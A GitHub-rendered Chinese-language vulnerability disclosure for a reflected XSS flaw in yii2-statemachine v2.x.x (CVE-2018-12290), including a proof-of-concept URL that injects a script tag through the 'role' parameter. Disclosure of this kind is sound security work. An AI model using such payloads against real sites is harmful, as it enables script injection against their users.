Skip to content

Latest commit

 

History

History
20 lines (13 loc) · 1015 Bytes

yii2-statemachine v2.x.x存在XSS漏洞.md

File metadata and controls

20 lines (13 loc) · 1015 Bytes
Raw

漏洞简介

漏洞名称 上报日期 漏洞发现者 产品首页 软件链接 版本 CVE编号
yii2-statemachine v2.x.x存在XSS漏洞 2018-06-12 longer https://github.com/ptheofan/yii2-statemachine-demo https://github.com/ptheofan/yii2-statemachine-demo v2.x.x CVE-2018-12290

漏洞概述

由于role参数过滤不严格,导致可以插入js代码造成跨站脚本攻击。如将role参数赋值为guest'%22()%26%25<acx><ScRiPt%20>prompt(123555)</ScRiPt>,并进行get方式提交,可造成跨站脚本攻击。

POC实现代码如下:

exp代码如下:

https://127.0.0.1/?role=guest'%22()%26%25<acx><ScRiPt%20>prompt(123555)</ScRiPt>

POC截图效果如下:

POC运行截图